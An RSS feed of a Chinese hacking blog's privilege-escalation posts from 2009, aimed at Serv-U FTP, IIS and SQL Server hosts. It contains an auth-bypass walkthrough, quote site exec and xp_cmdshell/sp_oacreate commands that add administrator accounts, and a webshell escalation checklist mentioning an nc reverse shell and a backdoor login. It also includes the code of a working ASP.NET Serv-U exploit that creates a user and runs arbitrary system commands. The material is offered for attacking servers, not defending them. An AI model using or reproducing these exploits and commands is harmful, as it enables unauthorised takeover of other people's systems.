<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>P9's BLOG &#187; 提权</title>
	<atom:link href="http://www.p9.net.cn/tag/%e6%8f%90%e6%9d%83/feed" rel="self" type="application/rss+xml" />
	<link>http://www.p9.net.cn</link>
	<description>同一天地间,同一网络下,P9'Blog与您共享今日互联网→WWW.P9.NET.CN</description>
	<lastBuildDate>Thu, 28 Apr 2011 23:57:55 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Serv-U7 提权</title>
		<link>http://www.p9.net.cn/sec/serv-u7-mention-the-right-to.html</link>
		<comments>http://www.p9.net.cn/sec/serv-u7-mention-the-right-to.html#comments</comments>
		<pubDate>Tue, 24 Mar 2009 00:51:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[ftp]]></category>
		<category><![CDATA[提权]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=951</guid>
		<description><![CDATA[一，su7是提权有几种方式？
有两种形式去干掉su7 ftp服务器。
1&#62;，登陆管理员控制台的页面
==&#62;获取OrganizationId，用于添加用户
==&#62;获取全局用户的“下一个新用户ID”
==&#62;添加用户
==&#62;添加用户的权限 or 添加全局用户权限 
==&#62;用户登陆
==&#62;执行系统命令添加系统账户。
2&#62;，登陆管理员控制台页面
==&#62;基本WEB客户端
==&#62;来到serv-u的目录下&#8211;users&#8211;Global user目录
==&#62;上传一个你已经定义好的用户文件
==&#62;用户登陆
==&#62;执行系统命令添加系统账户
而本文件使用了第一种方法。
二，提权的原理？
Su7的管理平台是http的，很先进。
抓包，分析，发现了以下路程是可以利用的。
1.管理员从管理控制台打开web页面时，是不需要验证密码的。
2.管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&#38;Language=zh,CN&#38;LocalAdmin=1”
3.管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4.管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。
在写php的过程中，遇到很多问题，比如函数不会用等等（—_—!以前没学过php），感谢“云舒牛”帮忙。。。
在分析包的流程，发现了一些特征，服务器返回的数据，全是以xml格式发来的。而在数据传输的过程中，设计的很经典。
Su7也有自己的数据库，他也会自己生成一个id。
这个ID是随机的，在你创建用户时，会先请求服务器生成一个，生成好后，修改该id的用户名，密码等。
这很像oracle的insert手段。
写工具的过程中，遇到很多麻烦，最大的麻烦就是这个ID问题，后来分析出来了。
添加权限时，也是可以利用这个ID的。
于是工具一共连接了6次服务器，这几次分别是：
1.用来登陆平台，使用那个输入任何密码都可以登陆的页面地址。返回一个sessionid，这个sessionid在以后的包都用到了。
2.获取OrganizationId，用于添加用户
3.用来请求一个用户ID。
4.修改该ID的登陆用户名，密码。
5.修改该ID的权限，加c盘的写删执行等。
6.这次连接是做坏事的，使用前面添加的用户执行系统命令。
三，为啥我明明显示成功了，但是却提不上去？
这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。
一般有以下几种情况：
1，可能是因为管理员密码不对。
参照管理员密码的连接。
2，可能是因为管理员限制了执行SITE EXEC。
有待程序修改，程序可以加一个让他不限制的功能。
3，可能是程序问题。
4，为啥作者有这么多理由不去改？
你没发现么？一旦把东西做完美了，那比较系统的防御方案就出来了。
如果不完美，让他以为我们就这点手段，防御系统也会这么认为。
不信的话，过段时间，防御方案出来了，肯定有一条：“修改site exec为不可访问”。
到时候，我再写个功能，把这玩意改回来就是。
所以，等大家都提倡要XXXX的时候，我再解决XXXX的问题。大家先这么玩着吧:)
四，关于管理员密码
默认为空，如果密码为空，填什么都能进去。
如果修改过，管理员密码默认会在这里：
C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive
文件中找到一个MD5密码值。
C:\Program Files\RhinoSoft.com\Serv-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为kx123456，去掉kx就是密码了。
你可以针对这个加密生成字典。
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_639" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/提权"><img class="size-full wp-image-639" title="Serv-u7提权" src="http://www.p9.net.cn/wp-content/uploads/2009/03/tiquan.png" alt="Serv-u7提权" width="90" height="100" /></a><p class="wp-caption-text">Serv-u7提权</p></div>
<p>一，su7是提权有几种方式？</p>
<p>有两种形式去干掉su7 ftp服务器。<br />
1&gt;，登陆管理员控制台的页面<br />
==&gt;获取OrganizationId，用于添加用户<br />
==&gt;获取全局用户的“下一个新用户ID”<br />
==&gt;添加用户<br />
==&gt;添加用户的权限 or 添加全局用户权限 <span id="more-951"></span><br />
==&gt;用户登陆<br />
==&gt;执行系统命令添加系统账户。</p>
<p>2&gt;，登陆管理员控制台页面<br />
==&gt;基本WEB客户端<br />
==&gt;来到serv-u的目录下&#8211;users&#8211;Global user目录<br />
==&gt;上传一个你已经定义好的用户文件<br />
==&gt;用户登陆<br />
==&gt;执行系统命令添加系统账户<br />
而本文件使用了第一种方法。</p>
<p>二，提权的原理？</p>
<p>Su7的管理平台是http的，很先进。<br />
抓包，分析，发现了以下路程是可以利用的。<br />
1.管理员从管理控制台打开web页面时，是不需要验证密码的。<br />
2.管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&amp;Language=zh,CN&amp;LocalAdmin=1”<br />
3.管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。<br />
4.管理员添加了用户的这个包和设置权限这个包，是分开的。<br />
所以，我可以抓包然后转换成php的socket连接post出去。<br />
最后在用经典的ftp登陆，exec命令。达到提权。<br />
在写php的过程中，遇到很多问题，比如函数不会用等等（—_—!以前没学过php），感谢“云舒牛”帮忙。。。<br />
在分析包的流程，发现了一些特征，服务器返回的数据，全是以xml格式发来的。而在数据传输的过程中，设计的很经典。<br />
Su7也有自己的数据库，他也会自己生成一个id。<br />
这个ID是随机的，在你创建用户时，会先请求服务器生成一个，生成好后，修改该id的用户名，密码等。<br />
这很像oracle的insert手段。</p>
<p>写工具的过程中，遇到很多麻烦，最大的麻烦就是这个ID问题，后来分析出来了。<br />
添加权限时，也是可以利用这个ID的。<br />
于是工具一共连接了6次服务器，这几次分别是：<br />
1.用来登陆平台，使用那个输入任何密码都可以登陆的页面地址。返回一个sessionid，这个sessionid在以后的包都用到了。<br />
2.获取OrganizationId，用于添加用户<br />
3.用来请求一个用户ID。<br />
4.修改该ID的登陆用户名，密码。<br />
5.修改该ID的权限，加c盘的写删执行等。<br />
6.这次连接是做坏事的，使用前面添加的用户执行系统命令。</p>
<p>三，为啥我明明显示成功了，但是却提不上去？</p>
<p>这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。<br />
一般有以下几种情况：<br />
1，可能是因为管理员密码不对。<br />
参照管理员密码的连接。<br />
2，可能是因为管理员限制了执行SITE EXEC。<br />
有待程序修改，程序可以加一个让他不限制的功能。<br />
3，可能是程序问题。<br />
4，为啥作者有这么多理由不去改？<br />
你没发现么？一旦把东西做完美了，那比较系统的防御方案就出来了。<br />
如果不完美，让他以为我们就这点手段，防御系统也会这么认为。<br />
不信的话，过段时间，防御方案出来了，肯定有一条：“修改site exec为不可访问”。<br />
到时候，我再写个功能，把这玩意改回来就是。<br />
所以，等大家都提倡要XXXX的时候，我再解决XXXX的问题。大家先这么玩着吧:)</p>
<p>四，关于管理员密码</p>
<p>默认为空，如果密码为空，填什么都能进去。<br />
如果修改过，管理员密码默认会在这里：<br />
C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive<br />
文件中找到一个MD5密码值。<br />
C:\Program Files\RhinoSoft.com\Serv-U<br />
是su的根目录。<br />
密码值的样式为(假设是123456)<br />
kx#######################<br />
#代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。<br />
破解后的密码为kx123456，去掉kx就是密码了。<br />
你可以针对这个加密生成字典。</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=951&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_951" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/serv-u7-mention-the-right-to.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ftp命令quote site exec的使用</title>
		<link>http://www.p9.net.cn/sec/ftp-su-quote-site-exec.html</link>
		<comments>http://www.p9.net.cn/sec/ftp-su-quote-site-exec.html#comments</comments>
		<pubDate>Mon, 16 Mar 2009 00:24:05 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=849</guid>
		<description><![CDATA[在获得服务器FTP管理员后可以用quote site exec命令来添加系统管理员,cmd下操作方法如下:quote site exec net user 用户名 密码 /add 添加一个用户
quote site exec net localhost administrators 用户名 /add 把用户添加到系统管理员组
quote site exec tskill PID 在 Windows 2003 中通过 PID 关闭进程
quote site exec tskill notepad 在 Windows 2003 中通过名称关闭同类的进程
quote site exec net stop iisadmin 停止 iis 服务
quote site exec net start iisadmin 启动 iis 服务
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<div id="attachment_639" class="wp-caption alignright" style="width: 100px"><a href="http://www.p9.net.cn/tag/提权"><img class="size-full wp-image-639" title="ftp命令" src="http://www.p9.net.cn/wp-content/uploads/2009/03/tiquan.png" alt="ftp命令" width="90" height="100" /></a><p class="wp-caption-text">ftp命令</p></div>
<p>在获得服务器FTP管理员后可以用quote site exec命令来添加系统管理员,cmd下操作方法如下:quote site exec net user 用户名 密码 /add 添加一个用户</p>
<p>quote site exec net localhost administrators 用户名 /add 把用户添加到系统管理员组</p>
<p>quote site exec tskill PID 在 Windows 2003 中通过 PID 关闭进程</p>
<p>quote site exec tskill notepad 在 Windows 2003 中通过名称关闭同类的进程</p>
<p>quote site exec net stop iisadmin 停止 iis 服务</p>
<p>quote site exec net start iisadmin 启动 iis 服务</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=849&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_849" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/ftp-su-quote-site-exec.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>webshell提权</title>
		<link>http://www.p9.net.cn/sec/webshell-tiquan.html</link>
		<comments>http://www.p9.net.cn/sec/webshell-tiquan.html#comments</comments>
		<pubDate>Thu, 12 Mar 2009 01:13:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=780</guid>
		<description><![CDATA[作者:唐钰小宝 本文由p9&#8242;blog转自华夏论坛
原文地址:http://bbs.77169.com/read-htm-tid-239508-fpage-5.html
1.看命令行组件是否存在wscript.shell
2.看系统版本，权限大就直接在C盘看，cmd下，set命令看下就OK！windows的为03，WINNT的为2000
3.看系统的FTP是否是SEVR-U,看sevr-u版本,cmd下ftp www.xxx.com，当然也有改了的，可以在webshell里扫下43958（小敲门：扫下65500，ftp提权的后门，可以用ftp www.xxx.com 65500进去，账号go，密码od）
4.存在命令行组件，并且是03系统，先看下是否支持aspx，aspx里面不需要命令行组件的噢..用Churrasco.exe溢出即可&#8230;.不能溢出，试试nc反弹个cmdshell，权限可能会大点！
5.上传cmd.exe，首选目录回收站C:\RECYCLER\，备选目录，C:\Documents and Settings\All Users\Documents\，C:\Inetpub\，网站目录！
6.执行命令，cmd路径选择上传后的路径，如：C:\RECYCLER\cmd.exe！添加用户格式：C:\RECYCLER\Churrasco.exe &#8220;net user 账号 密码 /add&#8221; &#124; C:\RECYCLER\Churrasco.exe &#8220;net localgroup administrators 用户 /add&#8221;
7.sevr-u提权，，端口43958，webshell自带一个SU-FTP通杀那个就是，然后cmd下，ftp www.xxx.com 如果能够用添加的ftp用户登录上去，那么执行quote site exec net user 用户 密码 /add 和quote site exec net localgroup administrators 用户 /add ，就行！
8.mysql提权，在网站目录寻找conn.asp web.config 之类的网站配置文件，如果网站是mysql架设，里面会有明文账号密码，得看运气了，可能有添加用户权限！
9.查看系统终端端口（默认3389），有命令行情况下，首先执行命令Tasklist/SVC查看服务进程PID值，TermService对应的PID值即终端端口PID值，然后用netstat -ano命令查看端口对应的PID值，跟TermService服务PID值对应下就可以找出终端端口，无命令行情况下可以用读取注册表来得到，前提是有一定权限，HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Wds\rdpwd\Tds\tcp键值PortNumber读取注册表，aspx权限大点，读取几率很高！
10.开启系统终端端口，有命令行情况，上传3389.exe（03系统）执行如：C:\RECYCLER\Churrasco.exe &#8221; C:\RECYCLER\3389 0 3389&#8243; 前一个3389是是文件名，后一个3389是终端端口！如果修改过终端端口，那么后一个3389就也需要修改！sevr-u也同样可以，quote site exec C:\RECYCLER\3389 0 3389 ！执行木马一样！
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.p9.net.cn/tag/提权"><img class="alignright size-full wp-image-639" title="tiquan" src="http://www.p9.net.cn/wp-content/uploads/2009/03/tiquan.png" alt="tiquan" width="90" height="100" /></a>作者:唐钰小宝 本文由p9&#8242;blog转自华夏论坛</p>
<p>原文地址:<a href="http://bbs.77169.com/read-htm-tid-239508-fpage-5.html">http://bbs.77169.com/read-htm-tid-239508-fpage-5.html</a></p>
<p>1.看命令行组件是否存在wscript.shell</p>
<p>2.看系统版本，权限大就直接在C盘看，cmd下，set命令看下就OK！windows的为03，WINNT的为2000<span id="more-780"></span></p>
<p>3.看系统的FTP是否是SEVR-U,看sevr-u版本,cmd下ftp <a href="http://www.xxx.com">www.xxx.com</a>，当然也有改了的，可以在webshell里扫下43958（小敲门：扫下65500，ftp提权的后门，可以用ftp <a href="http://www.xxx.com">www.xxx.com</a> 65500进去，账号go，密码od）</p>
<p>4.存在命令行组件，并且是03系统，先看下是否支持aspx，aspx里面不需要命令行组件的噢..用Churrasco.exe溢出即可&#8230;.不能溢出，试试nc反弹个cmdshell，权限可能会大点！</p>
<p>5.上传cmd.exe，首选目录回收站C:\RECYCLER\，备选目录，C:\Documents and Settings\All Users\Documents\，C:\Inetpub\，网站目录！</p>
<p>6.执行命令，cmd路径选择上传后的路径，如：C:\RECYCLER\cmd.exe！添加用户格式：C:\RECYCLER\Churrasco.exe &#8220;net user 账号 密码 /add&#8221; | C:\RECYCLER\Churrasco.exe &#8220;net localgroup administrators 用户 /add&#8221;</p>
<p>7.sevr-u提权，，端口43958，webshell自带一个SU-FTP通杀那个就是，然后cmd下，ftp <a href="http://www.xxx.com">www.xxx.com</a> 如果能够用添加的ftp用户登录上去，那么执行quote site exec net user 用户 密码 /add 和quote site exec net localgroup administrators 用户 /add ，就行！</p>
<p>8.mysql提权，在网站目录寻找conn.asp web.config 之类的网站配置文件，如果网站是mysql架设，里面会有明文账号密码，得看运气了，可能有添加用户权限！</p>
<p>9.查看系统终端端口（默认3389），有命令行情况下，首先执行命令Tasklist/SVC查看服务进程PID值，TermService对应的PID值即终端端口PID值，然后用netstat -ano命令查看端口对应的PID值，跟TermService服务PID值对应下就可以找出终端端口，无命令行情况下可以用读取注册表来得到，前提是有一定权限，HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Wds\rdpwd\Tds\tcp键值PortNumber读取注册表，aspx权限大点，读取几率很高！</p>
<p>10.开启系统终端端口，有命令行情况，上传3389.exe（03系统）执行如：C:\RECYCLER\Churrasco.exe &#8221; C:\RECYCLER\3389 0 3389&#8243; 前一个3389是是文件名，后一个3389是终端端口！如果修改过终端端口，那么后一个3389就也需要修改！sevr-u也同样可以，quote site exec C:\RECYCLER\3389 0 3389 ！执行木马一样！</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=780&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_780" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/webshell-tiquan.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>恢复执行xp_cmdshell</title>
		<link>http://www.p9.net.cn/sec/xp_cmdshell.html</link>
		<comments>http://www.p9.net.cn/sec/xp_cmdshell.html#comments</comments>
		<pubDate>Wed, 11 Mar 2009 03:07:47 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=777</guid>
		<description><![CDATA[1 未能找到存储过程&#8217;master..xpcmdshell&#8217;.
   恢复方法：查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =&#8217;xplog70.dll&#8217;declare @o int
第二步执行:sp_addextendedproc &#8216;xp_cmdshell&#8217;, &#8216;xpsql70.dll&#8217;
然后按F5键命令执行完毕
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
第一步执行：sp_dropextendedproc &#8220;xp_cmdshell&#8221;
第二步执行：sp_addextendedproc &#8216;xp_cmdshell&#8217;, &#8216;xpsql70.dll&#8217;
然后按F5键命令执行完毕
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
第一步执行:exec sp_dropextendedproc &#8216;xp_cmdshell&#8217;
第二步执行:exec sp_addextendedproc &#8216;xp_cmdshell&#8217;,'xpweb70.dll&#8217;
然后按F5键命令执行完毕
四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add&#8217;
declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\winnt\system32\cmd.exe /c net [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.p9.net.cn/tag/提权"><img class="alignright size-full wp-image-639" title="tiquan" src="http://www.p9.net.cn/wp-content/uploads/2009/03/tiquan.png" alt="tiquan" width="90" height="100" /></a>1 未能找到存储过程&#8217;master..xpcmdshell&#8217;.<br />
   恢复方法：查询分离器连接后,<br />
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =&#8217;xplog70.dll&#8217;declare @o int<br />
第二步执行:sp_addextendedproc &#8216;xp_cmdshell&#8217;, &#8216;xpsql70.dll&#8217;<br />
然后按F5键命令执行完毕<span id="more-777"></span></p>
<p>2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）<br />
恢复方法：查询分离器连接后,<br />
第一步执行：sp_dropextendedproc &#8220;xp_cmdshell&#8221;<br />
第二步执行：sp_addextendedproc &#8216;xp_cmdshell&#8217;, &#8216;xpsql70.dll&#8217;<br />
然后按F5键命令执行完毕</p>
<p>3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)<br />
恢复方法：查询分离器连接后,<br />
第一步执行:exec sp_dropextendedproc &#8216;xp_cmdshell&#8217;<br />
第二步执行:exec sp_addextendedproc &#8216;xp_cmdshell&#8217;,'xpweb70.dll&#8217;<br />
然后按F5键命令执行完毕</p>
<p>四.终极方法.<br />
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:<br />
查询分离器连接后,<br />
2000servser系统:<br />
declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add&#8217;</p>
<p>declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add&#8217;</p>
<p>xp或2003server系统:</p>
<p>declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\windows\system32\cmd.exe /c net user 新用户 密码 /add&#8217;</p>
<p>declare @shell int exec sp_oacreate &#8216;wscript.shell&#8217;,@shell output exec sp_oamethod @shell,&#8217;run&#8217;,null,&#8217;c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add&#8217;</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=777&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_777" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/xp_cmdshell.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NET版本Serv-U提权程序</title>
		<link>http://www.p9.net.cn/sec/net-serv-u.html</link>
		<comments>http://www.p9.net.cn/sec/net-serv-u.html#comments</comments>
		<pubDate>Wed, 11 Mar 2009 02:59:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[serv-u]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=774</guid>
		<description><![CDATA[&#60;%@ Page Language=&#8221;VB&#8221; Debug=&#8221;true&#8221; %&#62;
&#60;%@ import Namespace=&#8221;System.Net.Sockets&#8221; %&#62;
&#60;script runat=&#8221;server&#8221;&#62;
    &#8216; 
    &#8216; Love, Where are you ?
    Sub BTN_Start_Click(sender As Object, e As EventArgs)
        Dim Usr As String = Text_Name.Text
        Dim pwd [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.p9.net.cn/tag/提权"><img class="alignright size-full wp-image-639" title="tiquan" src="http://www.p9.net.cn/wp-content/uploads/2009/03/tiquan.png" alt="tiquan" width="90" height="100" /></a>&lt;%@ Page Language=&#8221;VB&#8221; Debug=&#8221;true&#8221; %&gt;<br />
&lt;%@ import Namespace=&#8221;System.Net.Sockets&#8221; %&gt;<br />
&lt;script runat=&#8221;server&#8221;&gt;</p>
<p>    &#8216; <span id="more-774"></span><br />
    &#8216; Love, Where are you ?</p>
<p>    Sub BTN_Start_Click(sender As Object, e As EventArgs)<br />
        Dim Usr As String = Text_Name.Text<br />
        Dim pwd As String = Text_PWD.Text<br />
        Dim Port As Int32 = Text_Port.Text<br />
        Dim Command As String = Text_cmd.Text</p>
<p>        Dim LoginUser As String = &#8220;User &#8221; &amp; Usr &amp; vbcrlf<br />
        Dim LoginPass As String = &#8220;Pass &#8221; &amp; pwd &amp; vbcrlf<br />
        Dim NewDomain As String = &#8220;-SETDOMAIN&#8221; &amp; vbcrlf &amp; &#8220;-Domain=cctv|0.0.0.0|43859|-1|1|0&#8243; &amp; vbcrlf &amp; &#8220;-TZOEnable=0&#8243; &amp; vbcrlf &amp; &#8221; TZOKey=&#8221; &amp; vbcrlf<br />
        Dim DelDomain As String = &#8220;-DELETEDOMAIN&#8221; &amp; vbcrlf &amp; &#8220;-IP=0.0.0.0&#8243; &amp; vbcrlf &amp; &#8221; PortNo=43859&#8243; &amp; vbcrlf<br />
        Dim NewUser AS String = &#8220;-SETUSERSETUP&#8221; &amp; vbcrlf &amp; &#8220;-IP=0.0.0.0&#8243; &amp; vbcrlf &amp; &#8220;-PortNo=43859&#8243; &amp; vbcrlf &amp; &#8220;-User=lake&#8221; &amp; vbcrlf &amp; &#8220;-Password=admin123&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-HomeDir=c:\\&#8221; &amp; vbcrlf &amp; &#8220;-LoginMesFile=&#8221; &amp; vbcrlf &amp; &#8220;-Disable=0&#8243; &amp; vbcrlf &amp; &#8220;-RelPaths=1&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-NeedSecure=0&#8243; &amp; vbcrlf &amp; &#8220;-HideHidden=0&#8243; &amp; vbcrlf &amp; &#8220;-AlwaysAllowLogin=0&#8243; &amp; vbcrlf &amp; &#8220;-ChangePassword=0&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-QuotaEnable=0&#8243; &amp; vbcrlf &amp; &#8220;-MaxUsersLoginPerIP=-1&#8243; &amp; vbcrlf &amp; &#8220;-SpeedLimitUp=0&#8243; &amp; vbcrlf &amp; &#8220;-SpeedLimitDown=0&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-MaxNrUsers=-1&#8243; &amp; vbcrlf &amp; &#8220;-IdleTimeOut=600&#8243; &amp; vbcrlf &amp; &#8220;-SessionTimeOut=-1&#8243; &amp; vbcrlf &amp; &#8220;-Expire=0&#8243; &amp; vbcrlf &amp; &#8220;-RatioUp=1&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-RatioDown=1&#8243; &amp; vbcrlf &amp; &#8220;-RatiosCredit=0&#8243; &amp; vbcrlf &amp; &#8220;-QuotaCurrent=0&#8243; &amp; vbcrlf &amp; &#8220;-QuotaMaximum=0&#8243; &amp; vbcrlf &amp; _<br />
                    &#8220;-Maintenance=System&#8221; &amp; vbcrlf &amp; &#8220;-PasswordType=Regular&#8221; &amp; vbcrlf &amp; &#8220;-Ratios=None&#8221; &amp; vbcrlf &amp; &#8221; Access=c:\\|RWAMELCDP&#8221; &amp; vbcrlf<br />
        Dim Quit As String = &#8220;QUIT&#8221; &amp; vbcrlf<br />
        Dim MAINTENANCE As String = &#8220;SITE MAINTENANCE&#8221; &amp; vbcrlf</p>
<p>        &#8216;Dim client As New TcpClient<br />
        Dim tcpClient As New TcpClient()<br />
        Try<br />
            tcpClient.Connect(&#8220;127.0.0.1&#8243;, port)<br />
        Catch eee As Exception<br />
            response.write(eee.ToString())<br />
            response.end<br />
        End Try<br />
        tcpClient.ReceiveBufferSize = 1024<br />
        Dim networkStream As NetworkStream = tcpClient.GetStream()<br />
        Rec(networkStream)<br />
        Send(networkStream, LoginUser)<br />
        Rec(networkStream)<br />
        Send(networkStream, LoginPass)<br />
        Rec(networkStream)<br />
        Send(networkStream, MAINTENANCE)<br />
        Rec(networkStream)<br />
        Send(networkStream, DelDomain)<br />
        Rec(networkStream)<br />
        Send(networkStream, NewDomain)<br />
        Rec(networkStream)<br />
        Send(networkStream, NewUser)<br />
        Rec(networkStream)<br />
               Dim tcpClient2 As New TcpClient()<br />
               Try<br />
                   tcpClient2.Connect(&#8220;127.0.0.1&#8243;, 43859)<br />
               Catch eee As Exception<br />
                   response.write(eee.ToString())<br />
                   response.end<br />
               End Try<br />
               tcpClient2.ReceiveBufferSize = 1024<br />
               Dim networkStream2 As NetworkStream = tcpClient2.GetStream()<br />
               Rec(networkStream2)<br />
               Send(networkStream2, &#8220;User lake&#8221; &amp; vbcrlf)<br />
               Rec(networkStream2)<br />
               Send(networkStream2, &#8220;pass admin123&#8243; &amp; vbcrlf)<br />
               Rec(networkStream2)<br />
               Send(networkStream2, &#8220;site exec &#8221; &amp; Command &amp; vbcrlf)<br />
               Rec(networkStream2)<br />
               tcpClient2.Close()<br />
        Send(networkStream, DelDomain)<br />
        Rec(networkStream)<br />
        Send(networkStream, Quit)<br />
        Rec(networkStream)<br />
        tcpClient.Close()<br />
    End Sub</p>
<p>    Sub Rec(o As Object)<br />
       If o.CanRead Then<br />
          Dim bytes(1024) As Byte<br />
          o.Read(bytes, 0, 1024)<br />
          Dim returndata As String = Encoding.ASCII.GetString(bytes)<br />
          response.Write(&#8220;out:&#8221; &amp; returndata &amp; &#8220;&lt;br&gt;&#8221;)<br />
       Else<br />
          response.Write(&#8220;What&#8217;s wrong ?&#8221;)<br />
       End If<br />
    End Sub</p>
<p>    Sub Send(o As Object,data As String)<br />
       If o.CanWrite Then<br />
          Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)<br />
          o.Write(sendBytes, 0, sendBytes.Length)<br />
          response.write(&#8220;in: &#8221; &amp; data &amp; &#8220;&lt;br&gt;&#8221;)<br />
       Else<br />
          response.Write(&#8220;What&#8217;s wrong ?&#8221;)<br />
       End If<br />
    End Sub</p>
<p>&lt;/script&gt;<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;/head&gt;<br />
&lt;body&gt;<br />
    &lt;form runat=&#8221;server&#8221;&gt;<br />
        &lt;p&gt;<br />
